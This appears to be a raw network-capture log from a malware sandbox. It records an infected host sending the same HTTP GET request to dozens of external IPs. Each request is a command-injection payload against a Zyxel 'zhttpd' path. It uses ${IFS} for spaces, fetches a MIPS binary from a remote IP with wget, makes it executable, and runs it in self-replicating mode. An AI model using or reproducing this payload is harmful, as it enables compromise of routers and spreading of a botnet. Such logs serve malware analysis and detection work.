                                          Jan 14, 2024 15:45:50.654699087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          179192.168.2.235249849.49.240.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654717922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          180192.168.2.235706279.26.154.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654741049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          181192.168.2.233813017.10.226.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654747963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          182192.168.2.2358816115.238.209.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654762030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          183192.168.2.2339002101.60.129.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654791117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          184192.168.2.2339986173.144.227.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654861927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          185192.168.2.234352267.63.151.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654880047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          186192.168.2.2347374222.82.167.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654905081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          187192.168.2.2343566118.164.215.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654931068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          188192.168.2.233632487.76.16.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654947996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          189192.168.2.234571877.57.164.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.654989958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          190192.168.2.233427653.105.79.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655045033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          191192.168.2.2343172101.97.127.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655055046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          192192.168.2.2341588147.43.129.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655086994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          193192.168.2.2334040198.144.221.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655108929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          194192.168.2.235540654.135.46.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655160904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          195192.168.2.235562619.122.4.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655172110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          196192.168.2.235164614.197.43.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655194998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          197192.168.2.2334480184.206.3.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655224085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          198192.168.2.234709814.142.167.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655261993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          199192.168.2.235278490.232.179.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655302048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          200192.168.2.235758490.220.32.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655340910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          201192.168.2.2346644139.132.101.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655364037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          202192.168.2.2348062177.13.113.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655399084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          203192.168.2.234298696.214.152.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655405998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          204192.168.2.235550667.36.235.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655441999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          205192.168.2.2346570204.54.92.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655503988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          206192.168.2.233665848.181.203.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655528069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          207192.168.2.234109292.132.44.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655563116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          208192.168.2.2340540122.128.216.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655600071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          209192.168.2.2341332204.84.227.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655630112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          210192.168.2.2336918125.163.67.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655673981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          211192.168.2.235333059.191.61.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655705929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          212192.168.2.2341986206.13.5.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655726910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          213192.168.2.2352824134.206.100.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655790091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          214192.168.2.234326448.150.206.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655822039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          215192.168.2.2340710182.119.217.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655836105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          216192.168.2.2352162144.211.159.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655883074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          217192.168.2.233351893.183.255.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655924082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          218192.168.2.233304496.77.103.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.655976057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          219192.168.2.234615289.209.82.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656032085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          220192.168.2.2340556172.172.10.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656094074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          221192.168.2.23391881.59.33.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656107903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          222192.168.2.2337564133.70.117.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656140089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          223192.168.2.2348390170.94.21.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656153917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          224192.168.2.234315891.169.152.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656188011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          225192.168.2.2346560217.227.218.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656235933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          226192.168.2.2354466142.220.235.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656279087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          227192.168.2.2358454211.155.26.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656325102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          228192.168.2.2356140114.75.105.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656332970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          229192.168.2.2344868160.219.1.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656358004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          230192.168.2.2348034213.84.97.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656373978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          231192.168.2.2360920112.229.255.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656373978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          232192.168.2.2333520187.169.112.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656413078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          233192.168.2.235666058.154.24.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656445026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          234192.168.2.2344386195.220.214.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656481981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          235192.168.2.2339140189.182.90.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656553984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          236192.168.2.233970660.119.68.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656570911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          237192.168.2.236049279.136.135.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656596899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          238192.168.2.2354144112.116.194.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656620979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          239192.168.2.2336734119.76.244.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656666040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          240192.168.2.2334128185.123.11.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:50.656692028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          241192.168.2.235187037.164.108.171443
                                          TimestampBytes transferredDirectionData
